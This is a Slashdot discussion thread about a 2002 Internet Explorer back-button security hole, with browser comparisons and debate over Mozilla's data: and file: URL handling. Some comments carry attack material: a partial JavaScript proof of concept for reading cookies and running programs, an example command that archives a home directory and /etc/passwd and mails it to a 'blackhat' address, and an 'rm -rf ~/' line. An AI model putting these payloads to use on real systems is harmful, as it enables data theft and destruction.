In reply to the content of your comment: I'm not too great on my NT security, but I understand (from my own experimentation) that IE (at least parts of it) runs in the "system" context under win2k. Is this true? Does anyone care to explain why this is necessary? Why does it require elevated privileges?

I dunno. The last MS OS I actually installed and used for any length of time was Windows98SE. I've used Win2k and XP very briefly, and I had an NT4 machine at work for a while. So I'll have to guess:

Since IE is "part" of the OS, it must be able to interact with various underlying system calls outside the confines of any normal security model? Some Win32 pigs are more equal than others? Surely MS gives other developers similar hooks through their DevNet program...

-B

Re:If MS had acted... any number of times...

[civilizedINTENSITY]

It was funny and deserved to be modded up. Especially the "Really Safe Back Button"! :-)

Re:If MS had acted... any number of times...

[bgarcia]

That was a pretty knee-jerk reaction to what was obviously meant to be humor.

Next time, try reading the *whole* article before replying.

Re:If MS had acted... any number of times...

[DrXym]

If you do respond to the guy asking why RH 6.2 had so many updates, remind him that those patches are for an OS, a webserver, an ftp server, an ssh server, file/print services, C++/Java/Perl development, editors, office applications, databases and a ton more besides.

If you totalled up all the patches required to fix a machine filled MS software it would probably be not much different. Except of course it would be different in that RH (and other Unix/Linux distros) release patches in a timely fashion whereas MS doesn't.

Re:If MS had acted... any number of times...

[Wee]

I'm not much of a Redhat guy, so I don't know how they issue updates. Are those 500MB all security updates, or are they full updates to the system?

I never bothere to even count up the size of the pakages, but aparently that's the size of every rpm released as an update since version 6.2. That's the diff between 6.2 and 7.0, 7.0 and 7.1, 7.1 and 7.2, all 7.2 errata. I can believe that there are 500MB of updates. Whether it shows how insecure Linux is compared to any other OS is hooey.

-B

Re:If MS had acted... any number of times...

[Tony-A]

You can laugh or you can cry. Laughing's better.
The situation is so ridulous that I've stopped worrying about keeping up with patches for a year or so. An up-to-date patched system is not fundamentally any safer than an old unpatched system, and considering things like "Really Safe Back Button", may well be even riskier.
"Trustworthy computing". In a world where Microsoft Windows Me quickly recovers from deleting the software that runs worms and viruses, it's not gonna happen.

Re:If MS had acted... any number of times...

[Tony-A]

They're so you can upgrade from 7.2 to 6.2.
Depending on exactly what version of what you are running, it's not as ridiculous as it sounds.
Seriously, RedHat is becoming pro-active, like OpenBSD and later FreeBSD, and closing up the hidey-holes where bugs and exploits might be lurking.
If you want to compare security, look at how hard it is to find a new exploit. Microsoft Windows looks like it still has a lot of low-hanging fruit.

Re:If MS had acted... any number of times...

[Software]

A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates

Are you sure he wasn't pointing out how few updates RedHat has? I just checked the Windows Update site on my copy of Windows XP, and it reports that, for Critical Updates, it needs to install:

Total (including prerequisites): 13 {files} = 19 MB, < 1 minute

This is for an operating system that's been out for, what, six months? And that doesn't include patches to all parts of the system; this is mostly IE! I'm not sure that it's all of the updates for XP, either. The earliest item on the list is Feb 9 2002, so there may have been items earlier.

Reply

[aozilla]

I tried to reply to say "At least slashdot doesn't have any bugs in it", but the reply button wasn't working...

I wouldn't hedge my bets on Mozilla so blindly.

[Starship+Trooper]

Mozilla has its share of problems too; it's just that the media is so busy fawning over the bleeding-heart "David vs. Goliath" vision of Mozilla (much like that given to Linux in the old IPO rush days) to highlight these troubles. One particularly nasty problem Mozilla has is the ability to encode arbitrary data into a URL starting with "data:". This misfeature alone is enough for me to keep Mozilla off all my high-security computer systems until the project decides to either a) remove this "feature" as the debugging relic it is or b) add a preference to disable it, like Javascript or animated images.

For those not aware of his problem, here's a synopsis. Mozilla will parse a URL of the form "data:content/type;encoding,rawdata and treat it as a file of the type given. For example, the URL "data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">" will create an HTML page that will immediately shunt you to google.com. Open up Mozilla and paste that URL in if you don't believe me. Using an encoding type of "base64", images, data files and even executables can be hidden inside a URL. Trolls have already exploited this numerous times for mundane things like embedding goatse.cx links; imagine if some malicious hacker were to design a page with a trojan .exe or shellscript embedded in an innocuous-looking URL!

While "data:" URLs can be filtered out with Proxomitron or avoided by careful scanning of the status bar before clicking any link, I think such a glaringly wide target for abuse doesn't belong in any project past the alpha-test stage, much less one that is getting ready to make a highly-publicised 1.0 release in the upcoming weeks. Until this hole is patched, I would recommend Konqueror to you. It no longer "crash[es] constantly anyway", as you put it; the 3.0 release is incredibly stable, supports made-for-IE sites much better than Moz, and also has more than adequate standards support. I would suggest rethinking your Mozilla deployment strategy and giving Konq another go.

Re:I wouldn't hedge my bets on Mozilla so blindly.

[_bobs.pizza_]

Try using the same thing with IE, using about: instead.... "

about:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">

That just loops forever, refreshing the page, but you can put any valid HTML/JavaScript/VBScript code that you want in that and it does it.

This code is kept in the Internet Zone, so you can't be as malicious as you'd like. It does make an HTML page w/ whatever you put.

Re:I wouldn't hedge my bets on Mozilla so blindly.

[Yottabyte84]

You can just click here then click the link on the resulting page.

Used to be in Mozilla

[jesser]

I found the same bug in Mozilla last summer while I was working at Netscape. My boss fixed it within a week, so versions after Mozilla 0.9.3 did not have the bug. It was bug 88167 if you're interested. I'm not sure why I didn't notice that IE was vulnerable as well. Anyone want to go through old Mozilla security holes and see how many of them affect IE 6?

Anyway, keep using that Back button. If you're using IE to browse warez/porn, you have more to worry about than someone looking at your cookie for another site. An attacker could just copy the IE exploit of the week from
http://jscript.dk/unpatched/. I believe that page has had current IE security holes that allow running arbitrary instructions for two months straight. (That means you can keep up with the latest IE patches, but if an attacker reads jscript.dk and can get you to click a link in AIM or read a message in OE, the attacker wins.)

By the way, what's with IE turning every cross-domain hole into a full remote compromise by letting sites link to res: urls? Current versions of Mozilla block links to chrome/res and even file, so a cross-domain hole doesn't even let sites read local files.

Re:Used to be in Mozilla

[bgarcia]

Current versions of Mozilla block links to chrome/res and even file, so a cross-domain hole doesn't even let sites read local files.

This is a rather annoying *feature* of mozilla. If an http: page has a link (just a link!) to a file: URL, then what possible security issue is there?

This case should be handled differently than the others. Many intranet servers have valid reasons for supplying file: URL's to employees.

Re:Used to be in Mozilla

[jesser]

See http://bugzilla.mozilla.org/show_bug.cgi?id=84128# c20. That explains why it's necessary to block links to file:/// urls. It also describes a hidden pref you or your corporation can set that will allow links to file:/// urls if backwards-compatibility is more useful than increased security.

Re:Used to be in Mozilla

[bgarcia]

See http://bugzilla.mozilla.org/show_bug.cgi?id=84128# c20. That explains why it's necessary to block links to file:/// urls.

(heh, I filed that bug). Again, this does NOT explain why a plain old link with no javascript involved cannot be allowed.

The problem is that mozilla handles all file references the same way, and it causes some safe cases to be disallowed.

It also describes a hidden pref you or your corporation can set that will allow links to file:/// urls if backwards-compatibility is more useful than increased security.

But I don't want to disable this security unilaterally for exactly the reasons stated in the URL you provided! All I want is for mozilla to recognize the cases where a "file:" URL is actually safe and allow it to be clicked.

And at the very least, mozilla should tell the user why clicking on such a link results in nothing happening (see bug 84128).

Re:Used to be in Mozilla

[bgarcia]

the DoS attack linking to /dev/zero

Try typing "file:///dev/zero" into Mozilla's address bar. There is no DoS. It asks you want to do with the binary file.

checking whether a file exists

Again, how is this accomplished with a plain old hyperlink?

planting a file using a helper app

Again, how is this accomplished with a plain old hyperlink? No java, no javascript, just a plain old <a href> tag.

Re:Used to be in Mozilla

[jesser]

The DoS attack: I guess I was wrong there.

Checking whether a file exists: you get the user to click on the link, and then you use javascript to see what happens after that. (This isn't the end of the world, and it requires enough user interaction that a page wouldn't be able to run a systematic search.)

The helper app problem: you get the helper app to plant a file in a known location, and then you link to the planted file. The browser opens the file, and since it's on your hard drive, it has somewhat elevated privs. IIRC, it can read any text or html or xml file on your hd. (I think the real problem here is that local files have too many extra privs, since a user might save a page intentionally. It might be possible to change that, at least in the browser.)

So maybe you're right.

Re:Used to be in Mozilla

[bgarcia]

Checking whether a file exists: you get the user to click on the link, and then you use javascript...

And I have no problem with blocking links with javascript attached to them. But plain-old, non-javascript links have no security issues, and should be allowed.

The helper app problem: you get the helper app to plant a file in a known location...

If you have a "helper app" that's planting malicious files on your hard drive, then file: hyperlinks are the least of your problems.

So maybe you're right.

Now, if I can only convince some of the Mozilla developers...

Re:Used to be in Mozilla

[jesser]

And I have no problem with blocking links with javascript attached to them. But plain-old, non-javascript links have no security issues, and should be allowed.

What do you mean by "plain-old, non-javascript links"? The link could be an ordinary a-href and the javascript could be elsewhere on the page.

If you have a "helper app" that's planting malicious files on your hard drive, then file: hyperlinks are the least of your problems.

Any web browser has to put files in its cache, and many helper apps do the same thing.

Re:Used to be in Mozilla

[bgarcia]

What do you mean by "plain-old, non-javascript links"? The link could be an ordinary a-href and the javascript could be elsewhere on the page.

I mean a hyperlink that, when clicked, results in no javascript being run (regardless of how the javascript appears in the page).

I think it would be even better if, when a user clicks on a file: hyperlink, javascript is temporarily disabled until after the new file loads.

Any web browser has to put files in its cache, and many helper apps do the same thing.

But only a malicious app would put a file onto disk, and then attempt to trick you into clicking on a link to access it.

Look, all I'm saying is that there are legitimate uses for file: hyperlinks in http: pages, usually in a business's intranet. I think it is a mistake to disallow all such instances in the name of security (or to have an option to disable all of the security), when we could change the security model to allow the safe instances to work.

Re:Used to be in Mozilla

[jesser]

But only a malicious app would put a file onto disk, and then attempt to trick you into clicking on a link to access it.

The problem isn't malicious helper apps. It's malicious web pages and helper apps that aren't familiar with the idea "cache your stuff in a random place because some web browsers let web pages link to local files and then automatically grant local files the ability to read other local files". The web page gets the helper app to put the file in a known location, and then the web page links to that location.

Not really

[Pope+Slackman]

1)Bundled....people are sheep.
2)Bundled.....a lot of people dont have the band or the patience to do a lot of downloading (AOL users on dialup)
3)Bundled...on a corporate win2k desktop where the user just logins in and cant really install much in the way of software...see 1) s/pc support personal/people

I don't really think so.

Up until recently (i.e. Moz and Opera maturing in to decent browsers) IE was the best game in town, it was just an added bonus that it came bundled.
Netscape 4.x has been a joke since IE's renderer got good (around 4.5, I'd say), and Netscape 6.0 release bugs scared a lot of people off.
Most people have never even heard of Opera.

However, if the new browsers keep improving, and IE holes keep appearing with this kind of severity, I can see people downloading other browsers, just like they used to.
But really, until late last year, IE, in all it's mediocrity, was still the best for most people's browsing.
It's reasonably stable, reasonably fast and renders pages reasonably well.
There was no incentive to switch to something either obselete (old Netscape), slow (new Netscape), buggy (Mozilla), or pretty much unknown (Opera).

There might be now.

C-X C-S

Re:Not really

[jspaleta]

"There was no incentive to switch"
...becuase its bundled...

http://www.m-w.com/cgi-bin/dictionary

sheepish
1 : resembling a sheep in meekness, stupidity, or timidity

stupidity
1 : the quality or state of being stupid

stupid
4 a : lacking interest or point

incentive
: something that incites or has a tendency to incite to determination or action
synonym see MOTIVE

motive
1 : something (as a need or desire) that causes a person to act

You say
"There was no incentive to switch"
I say
Bundled...people are sheep

lets call the whole thing off.

-jef

Re:Not really

[Pope+Slackman]

You say
"There was no incentive to switch"
I say
Bundled...people are sheep

Why would I switch to something that sucks compared to what I already have?
It's like trading in the Acura you already have for a Yugo.
So what if the better product is what you already have?

Or are you just another bitter Netscape zealot looking for an excuse to berate MS because they wrote an (at the time[1]) better browser?

C-X C-S
[1] "At the time", because browser lines are blurring rapidly. I can make a page W3C compliant, with CSS2, layers and most of the fun stuff, and still have it render basically the same in recent IE, Mozilla or Opera.
[Netscape 4.x can't render it for shit tho, even when the W3C validator gives it a perfect score.]

Re:Not really

[jspaleta]

Or are you just another bitter Netscape zealot looking for an excuse to berate MS because they wrote an (at the time[1]) better browser?

I'm not berating MS on how good or bad IE is. That was the parent poster. I was just giving input as to why no one has opera installed. There is a large segment of the population that would probably use opera if it were the browser pre installed, or even crappy old netscape 4.x. Most people aren't download happy...if they were everybody's desktop MS computers would have all the MS updates installed on within mere days of security update announcements. And if it isn't a NEEDED update corporates dont tend install extra crap on centrally managed win2k desktops either. If it ain't horribly broken...don't fix it...seems to be the moto of corporate pc support departments everywhere. If some company vp or ceo isn't crying over not having opera on the system...opera doesn't get put on the system...becuase IE is adquately preinstalled. And I'd imagine if opera were preinstalled...pc support personal would take the same pains to aviod installing IE on the coperate network. Having pc support departments ONLY officially supporting the preinstalled browser on an internal corporate desktop is going save hassle, time and money...no matter which browser it is. People are sheep, pc support people are sheep...the take what's given and use it as long as it meets a certain level of usability. The important factor is not the wealth of IE's features...its IE's preinstalled presence.

-jef

Re:What are the odds...

[SaDan]

Read the Bugtraq submission!

Title: Using the backbutton in IE is dangerous.
Date: [2002-04-15]
Software: At least Internet Explorer 6.0.
Tested env: Windows 2000 pro, XP.
Rating: Medium because user interaction is needed.
Impact: Read cookies/local files and execute code
(triggered when user hits the back button).
Patch: None.
Vendor: Microsoft contacted 12 Nov 2001, additional
information given 25 Mar 2002.
Workaround: Disable active scripting or never
use the back button.
Author: Andreas Sandblad, sandblad@acc.umu.se

MS was notified late last year... Just over five months ago.

Read, people... Read, then make comments. It's not that difficult.

Quick patch for the bug

[cscx]

Here is a way do disable this nasty bug. It should work in all affected versions of IE:

1. Right click the toolbar, and select "Customize"

2. Select "Back" in the list marked "Current toolbar buttons"

3. Click the "Remove" button.

4. Click close.

There! Now that bug has been squashed. I suggest you implement this in all corporate deployments of IE pronto.

Re:Quick patch for the bug

[nzhavok]

I'm undecided on whether this is "Funny" or "Informative".

The more I know about windows...

[jpellino]

the more i love my mac. none of this did a bloody thing on osx / ie 5.1.4

maybe it's the fix we got today, though

Re:The more I know about windows...

[sasha328]

It won't work on the Mac because you don't have C:/ or winmine.exe

Try modifying the scripts to point to something MacOSXy, maybe it'll owrk then.

Re:The more I know about windows...

[karlm]

no can do. owned by root or admin. you'll have to enter a root or admin password to do anything damaging.

Better, but not good enough. It's great that IE isn't actually part of OS X and the default account isn't and Admin (root) account, but there's still plenty of "damage" you could do. fileExec("rm -rf ~/;") sounds pretty good. Now, of course you make nightlybackups, so removing all of your files means a loss of only today's work, but it's still a pain in the arse. Oh, and does OS X have mimencode and mailto? It must have equivalent functionality somewhere. How'd you like fileExec("tar -cf - ~/ /etc/passwd | gzip --best | mimencode | mailto -s `ifconfig` blackhat@blackhat.com") I'm pretty sure the password hashes are in shadow on OS X, but the enumeration of users is helpful, as is all of your current user's directory.

Mac OS X is on the right path, but what the world really needs is good capabilities-based security. Your browser should not even be able to know if you have /bin/rm, much less be able to execute it, unless it asks you to give it an executable file handle to /bin/rm. The days of programs reasonably being assumed to actin the interests of the users are long gone. Security thinking should catch up and treat each program as a seperate user with few rights by default. In other words, everything should be sandboxed by default and should have to ask the user for anything out side of the sandbox.

Is there a real exploit here?

[Chuck+Chunder]

Even if an executable were encoded in the link would the end user not be simply warned that they are attempting to download an executable, as with any other URL that served them an executable?

It's only a security hole if delivering the content via the data URL is treated differently than getting it via an http, ftp or javascript one.

Re:Is there a real exploit here?

[phyxeld]

Look at the exploit code.

See how the script calls an alert() with the contents of a local file from your drive? Thats very very bad.

If a remote script can read a file off your hard drive, it can then write bits of data into an img tag on the page, passing your stolen information to a remote server (via the image's src element) without your knowledge. Very very bad.

Re:Is there a real exploit here?

[BZ]

Except data: can't read things off your hard drive...

Re:Is there a real exploit here?

[Chuck+Chunder]

Please look at the post I was replying to which is about an alleged Mozilla exploit involving data: urls, not the IE one in the main story.

Now if only all porn site admins would....

[coene]

.. do a little something like this:

<a href="javascript:execFile('file:///c:/winnt/system 32/net send * \"HI EVERYBODY IN THE OFFICE! I AM LOOKING AT PORN!\"')">CLICK FOR BOOBIES</a>

Change the hand cursor-shape in 9x's Control Panel

[yerricde]

I want Mozilla to give me the netscape finger.

Mozilla gives you the system finger cursor-shape when you :hover over a link. If you want Mozilla to give you the Netscape finger, or even the middle finger, you can select any .cur file in Start > Settings > Control Panel > Mouse > Pointers.

heh

[elmegil]

Good thing security is MicroSoft's number one focus now!

Re:heh

[great+throwdini]

Good thing security is MicroSoft's number one focus now!

You made a funny. In all seriousness, does anyone have a pointer to Microsoft's summary of its audit activities in the month of February? Did they ever issue a press release trumpeting its accomplishments during the month of intense review?

I'm not looking to bash, I just want to know what they managed to accomplish. Near as I can tell, the only benefit to me was a series (three?) of Internet Explorer patch roll-ups. Anyone have a fuller clue?

Re:heh

[weave]

Yeah, really. You'd think if they really did a full audit of their code during Februrary, there'd be a lot of new security notices and patches shortly thereafter to fix what they found.

When's the last time a security bulletin from them was prompted by something other than being forced by some evildoer from the outside discovering it first?

WORK AROUND!

[Jace+of+Fuse!]

Step One: Move the mouse pointer to the toolbar containing the forward and back buttons. Point to any part of the toolbar EXCEPT either the forward or back buttons. Empty areas or other buttons are fine.

Step Two: Use the mouse button you have configured to bring up the context menus. On most systems this will be the right mouse button and is often refered to as "Right Clicking".

Step Three: From the context menu select the option CUSTOMIZE...

Step Four: In the Customize Toolbar window will be two boxes full of items. Use the scroolbar to browse the contents of the right-most box and look for the button that says "BACK". Highlight the "BACK" button item.

Step Five: FNORD

Step Six: Press the REMOVE button between the left and right item boxes.

Step Seven: Press the upper right most button marked "CLOSE".

Your browser should now be immune to this exploit. Share and Enjoy.

Trolling, or just blind stupid?

First off, had you bothered to do any research, RFC 2397 defines the data: URL scheme--this isn't some Mozilla debug thing, as you foolishly asserted. Second, you haven't actually demonstrated how this behaves differently from a normal URL. If you click http://this.is.a.url/ and the document at the end has a meta refresh to goatse.cx, how is that different from a data: URL (other than the data:URL being easier to spot)? Same deal with a shell script or .exe; it won't autorun any more than if you clicked on a link and got in through HTTP.

I'm not sure whether you actually believe you've found a vulnerability, or are just trolling for Konqueror; either way, it illustrates the weakness of /. moderation in succumbing to a good line of BS.

First LiveScript, then JavaScript, then ECMAScript

[yerricde]

I think you're referring to ECMAScript formerly called JavaScript

First it was LiveScript, then when "Java" became a buzzword, Netscape changed its syntax to resemble that of a brace language (C, Perl, or the Java programming language) and changed its name to JavaScript. "ECMAScript" is the generic name, created when the underlying language (without any specific DOM) was submitted to the European standards body ECMA; "JavaScript" is Sun's trademark licensed to Netscape, reflected in the media type for ECMAScript source code (text/javascript).

Re:They did act

[LinuxGeek]

Well, they knew about this in November, they just spent the entire month of February 'fixing bugs'. Yet this still exists in a fully patched IE6. Hmmmmm. Not very effective, were they?

Maybe the "Act" they performed was mostly theatrical.

One reason I love Opera

[Arker]

Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.

Re:One reason I love Opera

[mgkimsal2]

Mozilla/NS is *much* worse at this than IE.

Re:One reason I love Opera

[ncc74656]

I agree, but can't live with the amount of screenspace the toolbars/adbars take up...

The reason Opera is a non-starter for me is that it's an MDI application. I don't want all my browser windows in one big "box." That it's adware doesn't help things much either (though I could more than likely filter the ads at the proxy server).

I just snagged a Mozilla binary...last time I tried it was several months ago. It seems to be fast enough (seems about the same as IE), and it has more finely-grained security preferences than IE. (I had turned off JavaScript except for trusted sites because I was tired of pop-ups and pop-unders. In addition to blocking those, it looks like Mozilla can also prevent sites from fscking with the status bar or resizing the browser window.)

The few problems I've run across with Mozilla so far seem to be fixable. The default navigation buttons are huge and ugly, but the Lo-Fi theme fixes that. There's no Google Toolbar, but the search behavior of the address bar can be fixed so it uses Google instead of Nutscrape.

I've been using Internet Explorer pretty much since it was introduced nearly seven years ago. The few pre-3.0 advantages that Nutscrape had over IE weren't enough to get me to switch. Since then, IE had pretty much gotten better and better while Nutscrape stagnated. Early Mozilla builds showed promise, but weren't ready for prime time (hey, it's only a beta). With more and more holes being found in IE (especially this latest hole...at least the sample exploit only launched Minesweeper instead of opening goatse.cx or something similarly nasty), I'm beginning to wonder if now might be a good time to make the switch to Mozilla.

Omniweb --- Semi-Related

[Amiasian]

I'm not sure about the other (commercial or open source) browsers. However, I use a Mac OS X Cocoa broswer, called Omniweb [http://www.omnigroup.com/products/omniweb/]. It has a feature where the user can stop loading individual parts of a page. For instance, say you're loading a page with 60 images. Normally, you'd click the stop or back button in a browser. In Omniweb, the text would still load - but you could stop loading some of the larger images.

Re:The simple solution

[nitehorse]

All of them are being stripped out? What if you escape them?

-clee

Works in IE 5.5

[techmuse]

The exploit also works in IE5.5.

Re:What are the odds...

[jesser]

"Rating: Medium because user interaction is needed"?! What's the chance that the user will hit the back button when they think it will take them back to a porn image gallery, 80%?

IE 5 for Mac OS X bug!!!

[toupsie]

Damn it! I went to the test page and tried all the links with the back button. Not one of them worked. Not a one. There is a bug in the bug when it comes to Mac OS X and Internet Explorer. Once again as a Mac user, I am getting deprived of the same experience that Windows users get with Internet Explorer.

Re:IE 5 for Mac OS X bug!!!

[toupsie]

Bless you! Thanks for thinking about us Mac users!

Important Mac OS X IE v5.1.4 Update!!!

[toupsie]

From Software Update:

This latest version - version 5.1.4 - resolves all potential security vulnerabilities in previous versions of Internet Explorer 5. This includes vulnerabilities that might have caused Internet Explorer to stop responding or caused a memory problem that compromised the security of the computer.

However, I rechecked the back button bug that Mac OS X users experience where minesweeper will not launch on the test pages. Mac OS X IE v5.1.4 does not resolve the user experience issue for Mac users.

Yes, I know.

[Wee]

I'm sorry if I can't even be serious about this anymore, but I hope you realize I was making a rather dumb joke.

Yes,I saw the joke. I liked it too. I just used your post to vent something that's been bugging me for a long time. Your post was the minor imperfection on the beer glass of the world which allowed the seed of my thought to find purchase and rise to the surface as a big festering bubble of disgust. How very Zen. I think I'll go write Haiku...

Seriously, though, I once had to spend a week testing alternate browsers so that I could develop a test plan to replace IE on the machine in our NOC (after one of them got rooted when an operator was browsing warez and pr0n sites). I'm bitter about IE. And I had a nasty day at work (wrestling with CorporateTime's horrible attempt at an API, if you must know) so I had to vent. And for that I must thank you. I feel much better without all that painful gas pressure.

-B

This is a major one ,, user interaction not needed

[rahul_inblue]

The flaw can be exploited *with out* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .

----cut here---

Press link and then the backbutton to trigger script.

Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)


Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)


Read c:\test.txt (needs to be created)


Read Google cookie

// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "about: ";
function execFile(file){
alert (badUrl);

s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}

---cut here---

You have to prioritize these things

[The+Silver+Slurper]

Is a fix for the back button exploit really as important as something like the following?

Q310510: Recommended Update Download size: 220 KB, 1 minute

This update resolves the "Playback and Copy-Protection Issues When You Try to Play the Snow White and the Seven Dwarfs DVD Movie" issue in Windows XP and is discussed in Microsoft Knowledge Base (KB) Article Q310510. Download now to be able to play Disney's "Snow White and the Seven Dwarfs" Platinum Collection DVD.

For more information about this issue, read Microsoft KB Article Q310510. (This site may be in English.)

Re:hm

[Kanon]

2) I can disable the pop-under ads on sites I frequent by putting those sites into the "restricted" zone. Mozilla offers me no way to disable the popunders without completely disabling Javascript. (I'd rather have a option for "disable all javascript based popups", but at least IE gives me SOMETHING.)

Get a newer version of mozilla and go into preferences/advanced/scripts and windows.

Turn off the "open unrequested windows" tickbox. Bingo. You now have to click a link before the popup/under will open. Sites can't open them for you.

Re:work around

[Xenex]

%systemroot%\system32\winmine.exe

Paste that into run (in Windows, obviously).

I see no reason why an exploit couldn't do that.

Stupid is as stupid does.

[BCTECH]

I have not seen a popup add in years. I was not vulnerable to the .eml bugs. I laugh at websites that are blank for people like me who have java script turned off. I have always thought that Java Script, captive X etc were the scourge of the internet.

Ever since we have had the option I have used the built in security functions of IE. Tools/Internet Options/Security

Turn off everything for your internet zone. Add all your sites that you visit regularly to "Trusted Sites" and enable all the bells and wistles you want.

If a site breaks because they have not done simple checks to see if you have java script enabled then screw them and move on to a site that is run by someone who has an element of style and thoroughness.

Here is a wish list I do have for IE though. One power tool I have allows you to toggle images on and off with a click . I would like such a power tool that would enable/disable java script with a click and another to add trusted zones on the fly. If anyone out there has the coding capability I think you may have something.

Re:Stupid is as stupid does.

[leighklotz]

Unfortunately, you are vulnerable to this one.

The insidious thing about this bug is that it breaks your security model. When you press back, the page you go back to is run in the security zone of the page you go back from. So, even if block "everything" in the "Internet Zone" site, if the next page you visit is in your trusted zone and you press the back button, it will run ActiveX controls or pop up or whatever bells and whistles are allowed on the page you came from.

Furthermore, note that Internet Explorer error pages (such a 404 Page Not Found) are automatically in the trusted zone. So, for you to be safe with your current policy, you need to do the following as well:

1. Avoid the back button from trusted pages
2. Don't click on broken links or anything else that gets an error page

The problem is: it's a designflaw.

[Otis_INF]

Buffer overflows... these are implementation-specific bugs and should be easily patchable. However, MS put a lot of functionality into IE (for the most part because it's bundled) and when you look at the separate parts of all this functionality, you don't see exploitable stuff. However, combining parts of the functionality CAN LEAD to a situation that wasn't forseen, and perhaps will lead to a vulnerability.

It's easy to say "Crap!" but it takes a wicked mind to combine the right parts of the functionality of a program to create a hole, a mindset which is obviously not present under the IE designers. (but which should be though).

As a true microsoftie I more and more begin to realize that the bundling should be undone, so the set of functionality build into the webbrowser is simply focussed on what it should do: rendering pages.

Using another browser is not the answer however. The only browser that comes close to IE6 is Netscape/Mozilla, however these browsers are also packed with features you'll probably never need but CAN probably be used to create a hole when combined with other functionality in the program.

read:

[leuk_he]

I thought the disclaimer was kind of funny: "I am not responisble because i say so." MS will blaim him for releasing the exploit. As punishesment they will not mention his name.

Disclaimer:
===========

Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.

Does not work with NT 4.0, IE 5.0

[harmonica]

Access denied error message. NT 4.0 wirh service pack 6, IE 5.00.2014.0216.

Maybe it's a feature?

[jeti]

I've been waiting for commercial browsers to subtly
manipulate information for quite a while.

Maybe sites served from Apache will somewhen load
0.2s slower then the ones serves from IIS.

Only on Explorer of course.

Re:hm

[shakah]

This isn't quite the same thing, but you can block individual sites from popping up windows on entry to the site by putting something like the following in your preferences file (user.js):

user_pref("capability.policy.popupsites.sites", "http://www.morningstar.com/") ;
user_pref("capability.policy.popupsites.Window. ope n","noAccess") ;
user_pref("dom.disable_open_during_load", true) ;

It's all about the Javascript

[Greg+W.]

I've said this before, but a quick glance through the first few comments at threshold 2 didn't reveal anyone else having said it yet, so....

TURN OFF JAVASCRIPT, YOU IDIOTS!

Javascript is the Incarnation of Evil on this plane. It is the Scion of Satan. It is the Bastard of Beelzebub. Javascript blew up the Twin Towers on September 11. Javascript is what killed your goldfish when you were a kid.

(We now return you to your regularly scheduled "my browser is better than your brower" war.)

Re:It's all about the Javascript

[Ziviyr]

Actually, having ActiveX off kept minesweeper from running here. Could still show me stuff I had, didn't seem able to execute much though.

MS patch for this already released March 29 2001??

[badzilla]

I tried the various POC HTML pieces in this thread and they all trigger my antivirus (F-secure) which sends me off to get Microsoft Security Bulletin MS01-20

This bulletin does not seem to me to have any relevance to the scripting problem we're talking about. However, the exploit does not work on my version of IE6, even if I tell F-secure to ignore the alert.

Re:So...

[frunch]

The more important issue here is that this bug eliminates the ability to use the "Forward" button too. If you don't go back, you can't go forward!

Congrats, MS, on killing two buttons with one bug.

Worse...

[allism]

If you clicked the link to read the article, you can't hit the 'back' button to return to slashdot...

I can't remember the last time...

[realdpk]

..I even USED the back button in my browser. Alt or control-left works for me! Down with mice!

(yeah, I know, same triggers. ;) )

revised

[Jagasian]

Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?

A: Install Debian.

Look at the parent of Chuck's post

[jesser]

Chuck was talking about data: URLs, not this IE hole.

Re:Secure Windows

[Graspee_Leemoor]

"install ZoneAlarm [zonealarm.com], and make sure not to give net access to any MS apps "

Tiny Personal Firewall is vastly superior and completely free for personal use. I combined it with TCPTunnel for Win32 (for port forwarding). The two products work fine together and can easily protect a whole lan if ICS is used under XP or 2000.

The source is available for the port forwarder. The firewall is ICSA certified.

graspee

Still more MS security flaws?

[Lonath]

That's surprising. Perhaps someone should document this phenomenon of not being able to throw huge amounts of people at a complex software project late in its development with any expectation of fixing it quickly. :P

Ya know, I think that they would have been better off if they had spent the last two months assigning everyone a book report on The Mythical Man-Month and then realizing that this change will have to be a permanent course correction instead of a short-term fix.

Any excuse to bash away at Microsoft

[Junks+Jerzey]

Sigh. The response to stories like this is why I've stopped reading Slashdot for the most part. I used to read it every day, and now I go for months at a time without even looking at the front page.

Yes, there is a security problem in IE. Yes, there have been many such problems in the past. There have also been security problems with browsers for Linux. The discussion goes like this:

Linux Newbie: Microsoft should be put out of business! They don't care about security! There are hundreds of security holes in Windows and Internet Explorer!

Level-headed Computer User: But there have been security holes in Linux and software for Linux.

Linux Newbie: But Linux is a more secure operating system! You can't do as much damage under Linux because of file permissions and other security measures.

Level-headed Computer User: But we're talking about exploits. By definition an exploit is something that you were never supposed to be able to do in the first place.

Linux Newbie: Down with Microsoft! Bill Gates sucks!

Re:Any excuse to bash away at Microsoft

[Quazion]

And this are the posts why i am thinking about quit reading slashdot, just cause some people are stupid it doesnt mean you should be stupid too ?

VShield blocks this

[blazin]

I just copied the source onto my machine and tried to access it. McAffee pops up saying something along the lines of "The file that is trying to execute has a variant of the Exploit.something trojan".

It then gives the option to terminate it or continue. I told it to continue since I wanted to see if patched IE 5.5 is vulnerable.

I cannot get the window to pop up again, but the scanner console says there was an infected file scanned, and every time I try to copy, rename, move, or create a file with the same contents, the file gets a .vir extension added to it. Changing the name of that file doesn't remove the .vir extension.

In related news...

[PhotoGuy]

In related news, Cern is reporting that "File, Open" is generally considered a huge security risk in all versions of IE.

tried it; doesn't work

[wazo2k]

I tried it...

it does work when the page is on my hard drive,
